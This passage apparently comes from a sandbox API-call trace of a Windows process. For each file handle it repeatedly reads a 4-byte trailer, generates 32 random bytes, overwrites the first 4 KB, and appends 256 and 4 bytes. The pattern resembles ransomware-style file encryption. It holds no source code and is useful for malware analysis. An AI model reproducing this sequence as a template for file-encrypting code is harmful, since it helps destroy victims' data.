lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0084.241] GetProcessHeap () returned 0x4f10000 [0084.241] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0084.241] GetProcessHeap () returned 0x4f10000 [0084.241] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0084.241] GetProcessHeap () returned 0x4f10000 [0084.241] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0084.241] CloseHandle (hObject=0x978) returned 1 [0084.245] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 127 [0084.245] SetFilePointerEx (in: hFile=0x97c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.245] ReadFile (in: hFile=0x97c, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0084.245] SetFilePointerEx (in: hFile=0x97c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.246] GetProcessHeap () returned 0x4f10000 [0084.246] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0084.246] GetProcessHeap () returned 0x4f10000 [0084.246] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0084.246] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0084.246] GetProcessHeap () returned 0x4f10000 [0084.246] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0084.246] ReadFile (in: hFile=0x97c, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0084.294] SetFilePointerEx (in: hFile=0x97c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.295] WriteFile (in: hFile=0x97c, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0084.295] GetProcessHeap () returned 0x4f10000 [0084.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0084.295] GetProcessHeap () returned 0x4f10000 [0084.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.295] GetProcessHeap () returned 0x4f10000 [0084.295] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0084.295] GetProcessHeap () returned 0x4f10000 [0084.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.295] GetProcessHeap () returned 0x4f10000 [0084.295] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0084.295] GetProcessHeap () returned 0x4f10000 [0084.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.295] GetProcessHeap () returned 0x4f10000 [0084.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.295] GetProcessHeap () returned 0x4f10000 [0084.295] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.295] GetProcessHeap () returned 0x4f10000 [0084.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.295] GetProcessHeap () returned 0x4f10000 [0084.295] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.295] GetProcessHeap () returned 0x4f10000 [0084.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.295] GetProcessHeap () returned 0x4f10000 [0084.295] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.295] GetProcessHeap () returned 0x4f10000 [0084.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.295] GetProcessHeap () returned 0x4f10000 [0084.295] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.295] GetProcessHeap () returned 0x4f10000 [0084.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.295] GetProcessHeap () returned 0x4f10000 [0084.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.296] GetProcessHeap () returned 0x4f10000 [0084.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.296] GetProcessHeap () returned 0x4f10000 [0084.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.296] GetProcessHeap () returned 0x4f10000 [0084.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.296] GetProcessHeap () returned 0x4f10000 [0084.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.296] GetProcessHeap () returned 0x4f10000 [0084.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.296] GetProcessHeap () returned 0x4f10000 [0084.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.296] GetProcessHeap () returned 0x4f10000 [0084.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.296] GetProcessHeap () returned 0x4f10000 [0084.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.296] GetProcessHeap () returned 0x4f10000 [0084.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.296] GetProcessHeap () returned 0x4f10000 [0084.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.296] GetProcessHeap () returned 0x4f10000 [0084.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.296] GetProcessHeap () returned 0x4f10000 [0084.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.296] GetProcessHeap () returned 0x4f10000 [0084.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.296] GetProcessHeap () returned 0x4f10000 [0084.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.296] GetProcessHeap () returned 0x4f10000 [0084.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.296] GetProcessHeap () returned 0x4f10000 [0084.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.296] GetProcessHeap () returned 0x4f10000 [0084.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.296] GetProcessHeap () returned 0x4f10000 [0084.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.296] GetProcessHeap () returned 0x4f10000 [0084.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.296] GetProcessHeap () returned 0x4f10000 [0084.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.297] GetProcessHeap () returned 0x4f10000 [0084.297] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.297] GetProcessHeap () returned 0x4f10000 [0084.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.297] GetProcessHeap () returned 0x4f10000 [0084.297] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0084.297] GetProcessHeap () returned 0x4f10000 [0084.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.297] GetProcessHeap () returned 0x4f10000 [0084.297] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0084.297] GetProcessHeap () returned 0x4f10000 [0084.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0084.297] GetProcessHeap () returned 0x4f10000 [0084.297] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0084.297] GetProcessHeap () returned 0x4f10000 [0084.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0084.297] GetProcessHeap () returned 0x4f10000 [0084.297] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0084.297] GetProcessHeap () returned 0x4f10000 [0084.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0084.297] GetProcessHeap () returned 0x4f10000 [0084.297] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.297] GetProcessHeap () returned 0x4f10000 [0084.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0084.297] GetProcessHeap () returned 0x4f10000 [0084.297] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.297] GetProcessHeap () returned 0x4f10000 [0084.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.297] GetProcessHeap () returned 0x4f10000 [0084.297] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.297] GetProcessHeap () returned 0x4f10000 [0084.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.297] GetProcessHeap () returned 0x4f10000 [0084.297] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.297] GetProcessHeap () returned 0x4f10000 [0084.298] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.298] GetProcessHeap () returned 0x4f10000 [0084.298] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.298] GetProcessHeap () returned 0x4f10000 [0084.298] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.298] GetProcessHeap () returned 0x4f10000 [0084.298] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.298] GetProcessHeap () returned 0x4f10000 [0084.298] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.298] GetProcessHeap () returned 0x4f10000 [0084.298] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.298] GetProcessHeap () returned 0x4f10000 [0084.298] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.298] GetProcessHeap () returned 0x4f10000 [0084.298] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.298] GetProcessHeap () returned 0x4f10000 [0084.298] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.298] GetProcessHeap () returned 0x4f10000 [0084.298] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.298] GetProcessHeap () returned 0x4f10000 [0084.298] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.298] GetProcessHeap () returned 0x4f10000 [0084.298] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.298] GetProcessHeap () returned 0x4f10000 [0084.298] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.298] GetProcessHeap () returned 0x4f10000 [0084.298] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.298] GetProcessHeap () returned 0x4f10000 [0084.298] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.299] GetProcessHeap () returned 0x4f10000 [0084.299] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.299] GetProcessHeap () returned 0x4f10000 [0084.299] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.299] GetProcessHeap () returned 0x4f10000 [0084.299] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.299] GetProcessHeap () returned 0x4f10000 [0084.299] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.299] GetProcessHeap () returned 0x4f10000 [0084.299] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0084.299] GetProcessHeap () returned 0x4f10000 [0084.299] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.299] GetProcessHeap () returned 0x4f10000 [0084.299] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0084.299] GetProcessHeap () returned 0x4f10000 [0084.299] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0084.299] GetProcessHeap () returned 0x4f10000 [0084.299] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0084.299] GetProcessHeap () returned 0x4f10000 [0084.299] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0084.299] SetFilePointerEx (in: hFile=0x97c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.299] WriteFile (in: hFile=0x97c, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0084.299] WriteFile (in: hFile=0x97c, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0084.299] GetProcessHeap () returned 0x4f10000 [0084.299] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0084.299] GetProcessHeap () returned 0x4f10000 [0084.300] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0084.300] GetProcessHeap () returned 0x4f10000 [0084.300] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0084.300] CloseHandle (hObject=0x97c) returned 1 [0084.305] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 128 [0084.305] SetFilePointerEx (in: hFile=0x980, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.306] ReadFile (in: hFile=0x980, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0084.306] SetFilePointerEx (in: hFile=0x980, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.306] GetProcessHeap () returned 0x4f10000 [0084.306] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0084.306] GetProcessHeap () returned 0x4f10000 [0084.306] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0084.306] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0084.306] GetProcessHeap () returned 0x4f10000 [0084.306] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0084.306] ReadFile (in: hFile=0x980, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0084.354] SetFilePointerEx (in: hFile=0x980, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.354] WriteFile (in: hFile=0x980, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0084.354] GetProcessHeap () returned 0x4f10000 [0084.354] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0084.354] GetProcessHeap () returned 0x4f10000 [0084.354] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.354] GetProcessHeap () returned 0x4f10000 [0084.354] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0084.354] GetProcessHeap () returned 0x4f10000 [0084.354] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.354] GetProcessHeap () returned 0x4f10000 [0084.354] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0084.355] GetProcessHeap () returned 0x4f10000 [0084.355] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.355] GetProcessHeap () returned 0x4f10000 [0084.355] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.355] GetProcessHeap () returned 0x4f10000 [0084.355] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.355] GetProcessHeap () returned 0x4f10000 [0084.355] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.355] GetProcessHeap () returned 0x4f10000 [0084.355] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.355] GetProcessHeap () returned 0x4f10000 [0084.355] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.355] GetProcessHeap () returned 0x4f10000 [0084.355] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.355] GetProcessHeap () returned 0x4f10000 [0084.355] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.355] GetProcessHeap () returned 0x4f10000 [0084.355] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.355] GetProcessHeap () returned 0x4f10000 [0084.355] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.355] GetProcessHeap () returned 0x4f10000 [0084.355] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.355] GetProcessHeap () returned 0x4f10000 [0084.355] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.355] GetProcessHeap () returned 0x4f10000 [0084.355] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.355] GetProcessHeap () returned 0x4f10000 [0084.355] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.355] GetProcessHeap () returned 0x4f10000 [0084.355] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.355] GetProcessHeap () returned 0x4f10000 [0084.355] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.355] GetProcessHeap () returned 0x4f10000 [0084.355] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.355] GetProcessHeap () returned 0x4f10000 [0084.355] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.355] GetProcessHeap () returned 0x4f10000 [0084.355] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.355] GetProcessHeap () returned 0x4f10000 [0084.355] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.356] GetProcessHeap () returned 0x4f10000 [0084.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.356] GetProcessHeap () returned 0x4f10000 [0084.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.356] GetProcessHeap () returned 0x4f10000 [0084.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.356] GetProcessHeap () returned 0x4f10000 [0084.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.356] GetProcessHeap () returned 0x4f10000 [0084.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.356] GetProcessHeap () returned 0x4f10000 [0084.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.356] GetProcessHeap () returned 0x4f10000 [0084.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.356] GetProcessHeap () returned 0x4f10000 [0084.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.356] GetProcessHeap () returned 0x4f10000 [0084.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.356] GetProcessHeap () returned 0x4f10000 [0084.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.356] GetProcessHeap () returned 0x4f10000 [0084.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.356] GetProcessHeap () returned 0x4f10000 [0084.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.356] GetProcessHeap () returned 0x4f10000 [0084.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.356] GetProcessHeap () returned 0x4f10000 [0084.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0084.356] GetProcessHeap () returned 0x4f10000 [0084.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.356] GetProcessHeap () returned 0x4f10000 [0084.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0084.356] GetProcessHeap () returned 0x4f10000 [0084.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0084.356] GetProcessHeap () returned 0x4f10000 [0084.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0084.356] GetProcessHeap () returned 0x4f10000 [0084.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0084.356] GetProcessHeap () returned 0x4f10000 [0084.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0084.356] GetProcessHeap () returned 0x4f10000 [0084.357] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0084.357] GetProcessHeap () returned 0x4f10000 [0084.357] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.357] GetProcessHeap () returned 0x4f10000 [0084.357] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0084.357] GetProcessHeap () returned 0x4f10000 [0084.357] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.357] GetProcessHeap () returned 0x4f10000 [0084.357] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.357] GetProcessHeap () returned 0x4f10000 [0084.357] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.357] GetProcessHeap () returned 0x4f10000 [0084.357] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.357] GetProcessHeap () returned 0x4f10000 [0084.357] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.357] GetProcessHeap () returned 0x4f10000 [0084.357] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.357] GetProcessHeap () returned 0x4f10000 [0084.357] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.357] GetProcessHeap () returned 0x4f10000 [0084.357] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.357] GetProcessHeap () returned 0x4f10000 [0084.357] RtlAllocateHeap 